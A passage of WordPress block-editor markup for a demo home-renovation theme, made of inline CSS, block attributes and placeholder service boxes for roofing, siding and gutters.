{\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#494848\",\"resheadingTag\":\"h4\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":25,\"ressubHeadFontSize\":17,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":20,\"ressubHeadSpace\":30,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resctaType\":\"text\",\"resctaLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/services/roofing/\",\"iconTopMargin\":0,\"iconBottomMargin\":35,\"iconImage\":{\"uploading\":false,\"date\":1622180355000,\"filename\":\"roofing.jpg\",\"menuOrder\":0,\"uploadedTo\":7,\"type\":\"image\",\"subtype\":\"jpeg\",\"id\":259,\"title\":\"roofing\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/roofing.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/home/roofing-2/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"roofing-2\",\"status\":\"inherit\",\"modified\":1622180355000,\"mime\":\"image/jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 28, 2021\",\"nonces\":{\"update\":\"5f56d3c42c\",\"delete\":\"aef82b5b03\",\"edit\":\"25a8bb0d07\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=259u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"uploadedToTitle\":\"Home\",\"uploadedToLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=7u0026action=edit\",\"filesizeInBytes\":7947,\"filesizeHumanReadable\":\"8 KB\",\"context\":\"\",\"height\":65,\"width\":88,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/roofing.jpg\",\"height\":65,\"width\":88,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":88,\"resshowPrefix\":false,\"counterId\":\"08934182-4560-4a6c-8515-6f6f806e013c\"} -->\n<style type=\"text/css\"> .skt-blocks-block-08934182-4560-4a6c-8515-6f6f806e013c .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-08934182-4560-4a6c-8515-6f6f806e013c .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-08934182-4560-4a6c-8515-6f6f806e013c .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-08934182-4560-4a6c-8515-6f6f806e013c .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-08934182-4560-4a6c-8515-6f6f806e013c .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-08934182-4560-4a6c-8515-6f6f806e013c .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-08934182-4560-4a6c-8515-6f6f806e013c .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-08934182-4560-4a6c-8515-6f6f806e013c.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 25px !important; }\n .skt-blocks-block-08934182-4560-4a6c-8515-6f6f806e013c.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-08934182-4560-4a6c-8515-6f6f806e013c .skt-blocks-ifb-image-content img {\n width: 88px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-08934182-4560-4a6c-8515-6f6f806e013c.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-08934182-4560-4a6c-8515-6f6f806e013c.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-08934182-4560-4a6c-8515-6f6f806e013c .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-08934182-4560-4a6c-8515-6f6f806e013c.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-08934182-4560-4a6c-8515-6f6f806e013c.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-08934182-4560-4a6c-8515-6f6f806e013c .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-08934182-4560-4a6c-8515-6f6f806e013c.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-08934182-4560-4a6c-8515-6f6f806e013c skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:35px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/roofing.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h4 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:20px\">Roofing</h4></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#494848;font-family:Poppins;font-weight:400;margin-bottom:30px\">Posuere tellus imperdiet facilisis.<br>Curabitur vaucibusy.</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"><a href=\"https://sktperfectdemo.com/themepack/gbrenovate/services/roofing/\" target=\"_self\" class=\"skt-blocks-infobox-cta-link\" rel=\"noopener noreferrer\" style=\"color:#333;padding-top:10px;padding-bottom:10px;padding-left:14px;padding-right:14px\"><span class=\"skt-blocks-inline-editing\" style=\"color:#333\">Read More</span></a></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPadding\":50,\"bottomPadding\":50,\"leftPadding\":45,\"rightPadding\":30,\"leftMargin\":15,\"rightMargin\":15,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"leftPaddingTablet\":30,\"rightPaddingTablet\":30,\"leftMarginTablet\":10,\"rightMarginTablet\":10,\"topPaddingMobile\":50,\"bottomPaddingMobile\":50,\"leftPaddingMobile\":45,\"rightPaddingMobile\":30,\"bottomMarginMobile\":20,\"blockId\":\"af9e4793-906c-4dfa-bbb9-ebc53b817ade\",\"opacity\":100,\"backgroundType\":\"color\",\"backgroundColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> .block-af9e4793-906c-4dfa-bbb9-ebc53b817ade .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-af9e4793-906c-4dfa-bbb9-ebc53b817ade .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-af9e4793-906c-4dfa-bbb9-ebc53b817ade .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 15px; margin-right: 15px; }\n}\n @media only screen and (max-width: 976px){\n .block-af9e4793-906c-4dfa-bbb9-ebc53b817ade .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: 30px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 10px; margin-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-af9e4793-906c-4dfa-bbb9-ebc53b817ade .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: 20px; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-af9e4793-906c-4dfa-bbb9-ebc53b817ade\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;background-color:rgba(255, 255, 255, 1)\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#494848\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":25,\"ressubHeadFontSize\":17,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":20,\"ressubHeadSpace\":30,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resctaType\":\"text\",\"resctaLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/services/tiling/\",\"resctaLinkColor\":\"#303030\",\"iconTopMargin\":0,\"iconBottomMargin\":35,\"iconImage\":{\"id\":28,\"title\":\"services-img2\",\"filename\":\"services-img2.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/services-img2.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/services-img2/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"services-img2\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:37.000Z\",\"modified\":\"2021-05-25T13:48:37.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"8af869eca5\",\"delete\":\"667bc07c15\",\"edit\":\"3755558faf\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=28u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":3796,\"filesizeHumanReadable\":\"4 KB\",\"context\":\"\",\"height\":65,\"width\":77,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/services-img2.jpg\",\"height\":65,\"width\":77,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":77,\"resshowPrefix\":false,\"counterId\":\"1d458a4b-40b6-411c-bb6b-0b07fb1d1b4d\"} -->\n<style type=\"text/css\"> .skt-blocks-block-1d458a4b-40b6-411c-bb6b-0b07fb1d1b4d .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-1d458a4b-40b6-411c-bb6b-0b07fb1d1b4d .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-1d458a4b-40b6-411c-bb6b-0b07fb1d1b4d .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-1d458a4b-40b6-411c-bb6b-0b07fb1d1b4d .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-1d458a4b-40b6-411c-bb6b-0b07fb1d1b4d .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-1d458a4b-40b6-411c-bb6b-0b07fb1d1b4d .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-1d458a4b-40b6-411c-bb6b-0b07fb1d1b4d .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-1d458a4b-40b6-411c-bb6b-0b07fb1d1b4d.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 25px !important; }\n .skt-blocks-block-1d458a4b-40b6-411c-bb6b-0b07fb1d1b4d.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-1d458a4b-40b6-411c-bb6b-0b07fb1d1b4d .skt-blocks-ifb-image-content img {\n width: 77px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-1d458a4b-40b6-411c-bb6b-0b07fb1d1b4d.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-1d458a4b-40b6-411c-bb6b-0b07fb1d1b4d.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-1d458a4b-40b6-411c-bb6b-0b07fb1d1b4d .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-1d458a4b-40b6-411c-bb6b-0b07fb1d1b4d.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-1d458a4b-40b6-411c-bb6b-0b07fb1d1b4d.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-1d458a4b-40b6-411c-bb6b-0b07fb1d1b4d .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-1d458a4b-40b6-411c-bb6b-0b07fb1d1b4d.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-1d458a4b-40b6-411c-bb6b-0b07fb1d1b4d skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:35px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/services-img2.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h3 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:20px\">Siding</h3></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#494848;font-family:Poppins;font-weight:400;margin-bottom:30px\">Posuere tellus imperdiet facilisis. Curabitur vaucibusy.</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"><a href=\"https://sktperfectdemo.com/themepack/gbrenovate/services/tiling/\" target=\"_self\" class=\"skt-blocks-infobox-cta-link\" rel=\"noopener noreferrer\" style=\"color:#303030;padding-top:10px;padding-bottom:10px;padding-left:14px;padding-right:14px\"><span class=\"skt-blocks-inline-editing\" style=\"color:#303030\">Read More</span></a></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPadding\":50,\"bottomPadding\":50,\"leftPadding\":45,\"rightPadding\":30,\"leftMargin\":15,\"rightMargin\":15,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"leftPaddingTablet\":30,\"rightPaddingTablet\":30,\"leftMarginTablet\":10,\"rightMarginTablet\":10,\"topPaddingMobile\":50,\"bottomPaddingMobile\":50,\"leftPaddingMobile\":45,\"rightPaddingMobile\":30,\"bottomMarginMobile\":2,\"blockId\":\"ac47cadc-3d5a-40f8-bad4-2d7510e7b898\",\"opacity\":100,\"backgroundType\":\"color\",\"backgroundColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> .block-ac47cadc-3d5a-40f8-bad4-2d7510e7b898 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-ac47cadc-3d5a-40f8-bad4-2d7510e7b898 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-ac47cadc-3d5a-40f8-bad4-2d7510e7b898 .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 15px; margin-right: 15px; }\n}\n @media only screen and (max-width: 976px){\n .block-ac47cadc-3d5a-40f8-bad4-2d7510e7b898 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: 30px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 10px; margin-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-ac47cadc-3d5a-40f8-bad4-2d7510e7b898 .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: 2px; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-ac47cadc-3d5a-40f8-bad4-2d7510e7b898\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;background-color:rgba(255, 255, 255, 1)\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#494848\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":25,\"ressubHeadFontSize\":17,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":20,\"ressubHeadSpace\":30,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resctaType\":\"text\",\"resctaLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/services/painting/\",\"resctaLinkColor\":\"#303030\",\"iconTopMargin\":0,\"iconBottomMargin\":35,\"iconImage\":{\"id\":29,\"title\":\"services-img3\",\"filename\":\"services-img3.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/services-img3.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/services-img3/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"services-img3\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:37.000Z\",\"modified\":\"2021-05-25T13:48:37.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"1df582acb1\",\"delete\":\"75ddbb8dd1\",\"edit\":\"b8f84e66c7\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=29u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":2302,\"filesizeHumanReadable\":\"2 KB\",\"context\":\"\",\"height\":67,\"width\":59,\"orientation\":\"portrait\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/services-img3.jpg\",\"height\":67,\"width\":59,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":59,\"resshowPrefix\":false,\"counterId\":\"5babfb35-1296-4ca0-b5db-01d178d15440\"} -->\n<style type=\"text/css\"> .skt-blocks-block-5babfb35-1296-4ca0-b5db-01d178d15440 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-5babfb35-1296-4ca0-b5db-01d178d15440 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-5babfb35-1296-4ca0-b5db-01d178d15440 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-5babfb35-1296-4ca0-b5db-01d178d15440 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-5babfb35-1296-4ca0-b5db-01d178d15440 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-5babfb35-1296-4ca0-b5db-01d178d15440 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-5babfb35-1296-4ca0-b5db-01d178d15440 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-5babfb35-1296-4ca0-b5db-01d178d15440.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 25px !important; }\n .skt-blocks-block-5babfb35-1296-4ca0-b5db-01d178d15440.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-5babfb35-1296-4ca0-b5db-01d178d15440 .skt-blocks-ifb-image-content img {\n width: 59px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-5babfb35-1296-4ca0-b5db-01d178d15440.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-5babfb35-1296-4ca0-b5db-01d178d15440.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-5babfb35-1296-4ca0-b5db-01d178d15440 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-5babfb35-1296-4ca0-b5db-01d178d15440.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-5babfb35-1296-4ca0-b5db-01d178d15440.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-5babfb35-1296-4ca0-b5db-01d178d15440 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-5babfb35-1296-4ca0-b5db-01d178d15440.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-5babfb35-1296-4ca0-b5db-01d178d15440 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:35px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/services-img3.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h3 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:20px\">Gutters</h3></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#494848;font-family:Poppins;font-weight:400;margin-bottom:30px\">Posuere tellus imperdiet facilisis. Curabitur vaucibusy.</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"><a href=\"https://sktperfectdemo.com/themepack/gbrenovate/services/painting/\" target=\"_self\" class=\"skt-blocks-infobox-cta-link\" rel=\"noopener noreferrer\" style=\"color:#303030;padding-top:10px;padding-bottom:10px;padding-left:14px;padding-right:14px\"><span class=\"skt-blocks-inline-editing\" style=\"color:#303030\">Read More</span></a></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"6a6f7893-59bb-4925-bdaa-e0b06bedc4e7\",\"topPadding\":30,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"className\":\"gb-renovation-services\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-services skt-blocks-block-section-outer-wrap block-6a6f7893-59bb-4925-bdaa-e0b06bedc4e7 background-type-none alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-6a6f7893-59bb-4925-bdaa-e0b06bedc4e7 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-6a6f7893-59bb-4925-bdaa-e0b06bedc4e7 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-6a6f7893-59bb-4925-bdaa-e0b06bedc4e7 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 30px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; }\n}\n .block-6a6f7893-59bb-4925-bdaa-e0b06bedc4e7.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0.2),rgba(255, 255, 255, 0.2)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-6a6f7893-59bb-4925-bdaa-e0b06bedc4e7.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-6a6f7893-59bb-4925-bdaa-e0b06bedc4e7.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-6a6f7893-59bb-4925-bdaa-e0b06bedc4e7.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-6a6f7893-59bb-4925-bdaa-e0b06bedc4e7.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0.2); }\n</style><style type=\"text/css\"> .block-6a6f7893-59bb-4925-bdaa-e0b06bedc4e7 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-6a6f7893-59bb-4925-bdaa-e0b06bedc4e7 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-6a6f7893-59bb-4925-bdaa-e0b06bedc4e7.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-6a6f7893-59bb-4925-bdaa-e0b06bedc4e7 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-6a6f7893-59bb-4925-bdaa-e0b06bedc4e7.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-6a6f7893-59bb-4925-bdaa-e0b06bedc4e7 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-6a6f7893-59bb-4925-bdaa-e0b06bedc4e7.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"columns\":3,\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"abb180d8-6220-4fbd-8b13-9b1a01abc33b\"} -->\n<style type=\"text/css\"> .block-abb180d8-6220-4fbd-8b13-9b1a01abc33b .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-abb180d8-6220-4fbd-8b13-9b1a01abc33b .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 